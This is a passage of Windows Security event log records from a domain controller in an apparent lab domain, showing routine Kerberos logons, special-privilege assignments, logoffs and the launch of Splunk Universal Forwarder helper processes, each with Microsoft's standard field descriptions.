Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264250
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBDE5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264249
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBD73
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62448
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264248
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD73
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264247
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBD2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264246
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264245
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBC3D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62447
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264244
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBC3D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264256
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1718
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264255
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264257
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264258
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1898
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264259
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264261
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264260
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264262
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBDE5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264265
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DF61C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264264
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DF61C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62460
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264263
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DF61C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264267
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x124c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264266
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264268
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264269
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264270
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
